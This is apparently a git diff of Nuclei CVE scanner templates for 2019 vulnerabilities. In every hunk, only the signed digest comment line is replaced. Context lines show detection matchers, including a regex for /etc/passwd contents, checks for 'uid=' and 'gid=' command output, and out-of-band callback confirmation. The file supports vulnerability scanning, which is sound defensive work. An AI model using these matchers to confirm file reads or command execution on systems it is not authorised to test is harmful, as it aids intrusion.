-65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202007e18fe9e807726b296064b6494160674540c87127f0abc0c29d1e9e025ca3022100c3fe4dcd8deed1b86bb966d12f312fdd3bb2ba80b85bd4e969bf1b862e1f5831:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100996dd475afbc8c17aea67c45fd219b94df101afcc7d01ded4b32def1b0639c560220565ec0f9cf6406cb6b878bb65de77bdc3df473eefb82c9b6d454031a2c31319f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 7efed427ef..1b215d8af5 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -49,4 +49,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100bc6b699cacda5151710f068e0e6fa7b0b390af53662a040f5fd741c43d603435022100c3192cb0efda585b53107d73f33c98e74289457e1ce6a71b8602699d1c95fcee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205262fd7d7a96f260dcaf0113cefe14978152efed9c7d326392c8131035bbc09e02210092cba10d9687becaaed51cc881efd901e13b0f4b615ce3f7ddb49862c222764f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index ccd1096340..1bb0a0cf6b 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018ab4dd37c194955c9cc42951fa54fdb7b8effe30fc756d12a64d7a3ea1b9f77022100aaaee8c74c323286576af892c10a4c9abe2198d4b5e27a8114266c66dfb52357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c4c4762c45efd107e3dc19e37b553089ee3c5ac4bed1ac8dc49218b1e01f26a022043a5c7cd2ec8f5ac2ecfefd526816b8d6a0ae8dd038d7b8b2e56910c36ec6760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 925da743ae..2dcb929082 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -83,4 +83,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203340b3245dd51d9b67c6f29e2eb95aa3da0875247e28110b582812e96814346302200db80c14d3d510ec344719ffefd2e392bb9316a3d49a3d4e3aae41b95b77c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9988b212c5ff3a4d1b56f624dba6eb8bc04332263598e77107cd4549e02fb43022062a1278076d1dd9bef5a95eaebc2def66b8b6f960460ca7e4efe13e13cd5e377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 1acb34a7ea..bbcbbd5be7 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220174ad13726040e1c031af42e1fa3053557a40c426c3d8775b0bce9ecd161b97002210099a5611cf0e09613e1657be5cd27fcdb6f9d9fc16484b701e2dc4f315cc04a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220275a5af7802c048a229a91d71441896cd434087781be8487907c3338fccb0b7a02207f404a3a3e7366d8386d69d7566de69f572fc9af15159ecc60b01c1ab14a7c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 144637db9b..95c326a79d 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "post galleries!")' condition: and -# digest: 490a0046304402205217fa5d440959f2c80a587abe7bebae86cb1964d9c81277de7f8ce83833bfee02202d3d0b408e755ad0ecb80c3a9827a8c06a6c187d00b50e6c01451d50ac04f735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056a16f056cc58fb006a459c9168517f925edb27a7006189b7da06f91c0dd5be5022062657c2a2ac0ce3b00eb44b4a35b8337040849120130fdbb561263e4e36f81cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index fa7f1d7ba5..bdeca80bc0 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100960552edd3946d0a878780c7ec753f698b38790378a00d001ad8e698e433b615022100ef13927f3380602ec2ba9ad84ae009738ee47b6ac76599185f408be90af0bd98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd07f345ee9ee0404866dd839e20885d81d97b4d14a5a52ddd02d9c40b34d91d022100fded75594eebc1f4fde50dffe2d85704005119e1208884d4bf320b0739ffd219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 5717c86fcc..1e6139120e 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f89477db069d52a4cc684cd168c42ec2ffa472071204b0269ed495e2537f8fa3022100b6a151e5dada6a57a48310f599b3b354ff665e240d2bb1db1ef17038fc93dc17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f9e53b5bbe186eead22c5d94047633edadc37b403e5d466f3bb3dd0ac785c28022100b701684e93c0dd5845c17d0cf39e7f2083164299bc4f8cba427b4e77a63f0dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 6451b4d66f..3a947e6bf5 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -44,4 +44,4 @@ http: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and -# digest: 4a0a0047304502201d92a0801c2f43788aed32ed75ef458b62aca7e252963f4eb1fcc936afa07554022100df7afc1ba5725bcfdeb382cf89b08067d8bd2758da7a241b7e2de0eb9c038da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220280b2ea7e5f9a130af05a4cb347a3f11feac0e1a828778b316120ca09497b35202203c6b90c15e13f7644e7378a3f6c190122d02e561e6c633da4d7806ad48cc6593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 481ab5c4b8..54bd7d203a 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -55,4 +55,4 @@ http: - 201 - 409 condition: or -# digest: 4b0a00483046022100918f5cd75dc4ca87573ef7bda7b98585ca4b22397253f2259df83d4d89086569022100fe7217e13fc2ec1c9cf8e4cf1e9dcf8c2162197bb6c0768b3aa91cbbb3e87234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032df3d6d70691f08d27ca8999aae73a3455a4e1e09b4d94acb631f95fdd1803402201b0257ba21bc3b329e02836db3955782171cff35a3998fe795a0ec1b9ec023c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 03c8285e4f..92b7dab17b 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -43,4 +43,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100a638261fa16395169184c7769f4da8a8e957bb6a7ecbb48e08835e7d0fbb3e75022100cfb55688ecaa9d95404cb8d17c2d291274a6466a9b65cea745641e4325c2bbfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202380b19c009ef3cdcd0156d621203e553917d5ba91109cdf1694e2d725a82910022037ba291c44635675550212ffea435638f2b503ca360a6f4520960596ebccec48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index aeaded7539..13a039637e 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201ca94f30ff7dbb4635b2f005767ba3eaa9489c54f2ad57c33e2f23df55c1d0b6022100d0ac6506529e1e6fe832db0634f3a6ca0f8c77d16d959597a3421de3c2f04aaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018d2b67e1e0a3333f6012130917e6fd4937e0e93b8a27ffcfc00046b55f2dc0a0220719240472fa14c7ae17e758f8c76fc1a383e0122e3580e59325b801b71ccfad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 8951eeb3ae..60a837b639 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100883f7b6ac0eb6f91c28a201beec90c216df8296a09b56e6328378d54c8f68fab02203ecee5b5f73181d431655410ee02832559b60896d22aab17e1e22edb711db782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2d0674ffdf3a85fa6d9c2960f5251b04b031381c90421ae56931ca149644c0c0221009225bd042aa3c5adb3b06f0216881c17de04318d669e6cd2895fbcfa7806eb9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index a17f36a226..c433649c88 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008be1f9513f4cd8ba8c443769f746d53aac14d4c77b04f72e18394110f605f920022100bf37afa5281e8415049ecc8a0ee4031dd17d865dc828e2935c7911b2d5180c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220108b02b3a681fbbee93437bf8d74b1eae57cf93529b9422dca41139bf25c6a0302204917a36515a81b0fbde8658f625dbc4c0dcaa1f8bf14d8a684f6f39e0813e7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 83eb26ec1c..1c28ea68c4 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b78e47211e9117540a361a7bbf61d48981be1df9f46a4082d26c40b81df38d6102200512ae445356bf97e4696e845580d7182fea7be874fd8a8faa74d11473c7cc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9cefe4abc7fdad019d98919e8ef9f74edc413f523bc8300b344f6ad14137b8802203abbab9c423759cadf12903e6cf4b107694f8563d6a3ca13e2e3ed5aa61f41e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index ad952bf0f0..b00f7bcb58 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030e736d01799c2113774c8489d2c2e060bef7f6df8fab48352114e2422525da1022100e07a5694f1213b26096d937017a9cdfb6e8a3dbf07b62a4e0844545de0af6936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a612a75be6521437081f8bac9e2e5c62e04d1e42d6ee7b99a60598c63115beca022070efba7aa3de34d99bfb42f9b32688b464ede61623553b8ff6233087d08f5bde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 1853e78164..c04c68ea1d 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096f3aa0ccf71b8bb1f2b334d4e0d25631a25c29ecb407720f516c3b5aa1b054102202ccf8f52ed8812690ac44e08d4443f44f0d5601cdca85cae736756f4bad6074d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 5721c50f2a..d63c6453a7 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100defa8caef3bfc49d27462a363fbb840af42c8534de065f888f06b35299e8683f02204ecaa3467ff227bbd38b2b2cb2433ae54ea6ea587ec1ed3e9e30ef053c3ca6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100835f91a6ead03e981e19a70bfc1e1d265a03ecb2cabe1981d35f7f48a3df2f54022100e55c02b83537d0a796b2b4741d3320de30665d586972c146596ff543b60ceec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index f0f2c59aab..2dc660635f 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041e38ab4f69ae5bbc10c1c079445092bd9b7ba47ec94b0f26f11671207b071b7022100fc30926c548ed45e6650130f74877fd10143b2755ac1dcf25126cfef6c219132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b57c5627b5a07724a21a5b6c66b29bdd3b1853f86c93f7c5d3d8c8cbcae1a09022100af469eb16537815f6a042aa9a7ad7a3bbc7a1e08d77315ae599b5df1c512a322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 174046ade5..89f7376ac7 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -75,4 +75,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 490a0046304402202f0100438cbcf68274f7fff6ce478d2a2ca21f32f46deb898e207525f451475c0220712b1b32f8d0610d3efdce240df9bb5fa0894138f2d237d00a582b89c1c9d88b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2643129e31952e9cf7c3318b52efcac062acc9064a29d60c0f8103c8d3a0e58022100955f57a55270cc1d4529e495bfeeb27b66b8ac7a741e5af2e9f37ce321b3d2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 80bc418778..128ff22994 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -60,4 +60,4 @@ http: part: body_2 words: - 'CVE-2019-17574' -# digest: 4a0a0047304502201cb7a532725f7804448ffc27f5f766edf3676e258b055224261a99d5047c48880221008ee525f52b9b04dc5b281d401e426a6c3519187ae7fa418713b6b6135c6ddc48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220353cbedd75e2b480e8f6f9d76a276dfbfb15fbf6a7152a3ecaa5ace8e4d6b56c022100ff9ed95c64ed4b24e578c332dc881f7dd9aa3d565d4f23fdc20a1ab9504139d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 092aec940b..bebd3f5fad 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fb82bfb26b97edcb70f493b3640966574b012e563f89c2cdf77953916740bd2022100c643b657ac203096fd96e6dd9cd4a8942c4db7a202addc62e1a0390d913b83e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e93bbc96a7bb5945b58dada7d9b3c3b04ae3b8afaca4a545e1d62d129334aaf022100836757c1e5af51c0626ec9e6ba4d71c0a5b01b8465420f223446abaf209de755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 6812129e3c..f05491908a 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -60,4 +60,4 @@ http: - "status_code == 200" - "contains((body_2), '{{randstr}}')" condition: and -# digest: 4a0a0047304502205888e7c28a2ed34a699ba6a61abd7d0c921a1fa089b3ea0c8642abd3d44e024c022100ecc132734e78ce44fd4988a443a7fdfe894a409ef6a6b888ea12d9a141aa6eb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e50c4759b7fbf9e41eb62b443a4c39aadf3f8ebcedaae37654bd39f3b71f2aa30220491f018e5c581c55134ac4fef34785aeb9c11b5129928f9b1f9494da5c580b0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 0c182487f7..0398a35e5a 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ceca95e0d23de7e0a57b502dd0f9cdbcb2ff6275f928581667d5d77e31bd462022100c5340466ae8dcfee1d77f4663912ab93da119436b3e23013e6b82fa1f43129ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049d0080c35443f8c2de85d54b855c30070a25fa6d9db43574025896344fdb2d102207db629aea428693523ca09a2655d8861316f7a962ced5b22ab67892601eb96f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 884b7bef1d..8dfa30b3db 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c97dcd16b26a9f853e896fff16bdfca2e945384c8fb853575a97d914119567a402204e4dda75b4708e3172fcf572229e6bff3e9a9a9d07902016e47f10b21ac17682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100facc830da4786b48cef07848a6b14fcef6f8e742b8130beac4497f1f35629b3902210091898d99487171ca2d220c043f0e5c639a0c325ccc68f6132b3ffd0abc68c8d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 89dc5b1b26..abef22e9e1 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -43,4 +43,4 @@ http: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and -# digest: 4a0a00473045022100becd80dbf279426e7a1fe9e2ea9aaade6fcfdbf4779b94d39ce66df3c0b9bc64022071ce3b120374409a19b28421708bba3a36183bbec15e7eec5cd97a6bc7aa03a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093b0a98e94593cc39997cdeb7fe6300e3c3b67107346c1bef854fbe2db65078702204eb77fdfc7895a466d57edb6a462fa07823e2803b6ea4f5a67f0170ba6a3d3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 3cb803769b..78059e4bdb 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -45,4 +45,4 @@ http: - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")' - 'contains(header, "application/octet-stream")' condition: and -# digest: 4a0a00473045022067f8931eeb97e0fbffc1398a800aa506accd3b190b654c90cf98eccafda48444022100d3f77b11e58945d5ba55c13e661a4a09440e9213c8b66cb3c5aca2899f208872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d54f540b5b6aeff843c04a84ea89453b4f87d437225f5a58ad950aaf7b962d0902204e33ec81c762ae79110891ee18ab9502a9f1676025edb1130764a2cf293e6fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 2d3b16c8c7..45a98c24f8 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5ad53f288f5e762b0cc82cc9550c9579cd806364dc27e774066c5c39a609a7202200c305215c8277f0c9f1f33f65007eb54b3d20451039075bab6ad020fc8af7d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016bf100f90067e9f71145810f28c7a2914a641cf8e0444dd9a981a24de72d27c022100e1ffa50abf3d2a3f444ad0832b9e6b98de5887b3df7f8b70a8956e3a0a7b474d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 6ac759892a..bdc675f309 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d51d1c91d4fa4fbf61427615f603ea47c5bc63d21cffdeeaf3f3dbb158d2e300220205d9a4c11ed838c8184b612a4f403d8aea7add01d0aebedaefe25a41feb2e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100949bc4cf9ab6e192edfaa42fcadd34039e6cac53ec3d1a1c7da42d127a31f1d30221009ad9251990b61b0bdf32d6bfd521674fd82859a463284582ed414cb9c6e58295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 6a3e56e3e2..9dcd6e9d39 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -45,4 +45,4 @@ http: part: header words: - "text/html" -# digest: 490a004630440220364007b5b353132d3e613a97b3c9f9453c1458e01438e0e259cd73afc23276ad022001dd8bc347d2107af7f57bd1fab63468c0320329d58618fcebf87bed4fd9c85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024884faae7701b6a07896a32a39087a2bd23090324c05e7ce003a3d4d429d189022100a2877fdbbfec2596e80d0b083f7eaa688ab7187dddb5da4c2e4ca88d9523bd4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 0d1d5a74ce..6f80d05cdc 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faf232bd3b470896bfd6f1839431dd8e6ead641fbbb1e451fca6962d26d4edd2022100a4c614560de90fa39676fe8a354bc91018b6af8965156c03a8cab5a1497d0698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8f5eff7bca85ed1b36cb2f33b5bcb13567551fd4de1a132441c2807c0d65df9022100ad45f03be3ef1bd869708b1fdeeefedad02b75fa3a6f1d3436d96859384b99c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index dc4e62d988..64ce0e918a 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022046ac7207d2f9331283e0b83f2ec5f492144749de02ae7a6eb328fc4c5c3d40270220014b1f4e41a4c8e7fb88abf43f8baf6f2673f8fd542c36dcc365a951f84516a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db3898e8debc70333898a4da2e52f2298915516a6f94567274fb028bb9ed6f3a02206de19519126f12ff63151aa49dcd6299983aececf7464e25cb9640c8ec5836a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 0ac744ddd1..6e29270446 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b58799e6f8127779c0e815988ea4492ea6d8636cc9b2d9a0c8b6619e4d8d6078022100e896460a50bf9af6cc431831d64f1bdb58867e720e5cf1e203c1ef4431670286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c3019a9fea0720e363c5b335733dbefff6b5b99f66f004b770fa8739902aec2022100d20ed4325f8dd9326a57e7425e052d6a47c83cfb30de22810211f067d3bfb132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 56e051bd92..d0020f0a6e 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402207b030508d41e46ca977aafde5198239546dfabdd24b41f6b88320a65b420e5be02204fda972f27c73ddeb480e4b4e8d7df69e7a95255fa1d2ecadddce1a24bdee125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f94a7523a6b2d3029683d487100c7471f31bc148f1a0279518a51a7c61df462902202538dac4a94f712e9756893e94183a58e214eea3ea8acb73ca67fcd85bb752b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 86059f5e39..db6c812407 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -65,4 +65,4 @@ http: - 'status_code_2 == 202' - 'contains(body_3, "Vulnerable")' condition: and -# digest: 4a0a00473045022056f570dae3a475d8e9d5946b8f097ff6a3bc87242b915d980e8f79e50efedf23022100af5ffb8655d0e5c30dc211cc148590b77a9ac2dee63462cc90701bb0969ac0f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f965873795d6132a4fe1d816de74d2a90ee6ebfa58b436a5075983910d4853e9022100d5b679ab7b4c1f4b7702268a7fcfc9615bf6c6716008eb61463c3c15abd5409e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index e4b05c5215..474163baa2 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -84,4 +84,4 @@ http: - 'ta name="ajs\-draft\-id" content="([0-9]+)">' internal: true part: body -# digest: 490a00463044022043ba35e864a4f273e70a587b37a6fa0d0c24dc0d708b756d462b0829909266040220220f314ba326bf955773daff7b02179da1e97126da43b517b8ad8d5e49756d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023954ef262e10a2797891b9272caadb091696a23cfcee6a3de46c63198faa3170220636a447d66efbafff4abbc6153a712e1b6975e19091066b9fae32ab88ef94a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 6aeb1e5a2a..d344db99a1 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -50,4 +50,4 @@ http: words: - 'total":0' negative: true -# digest: 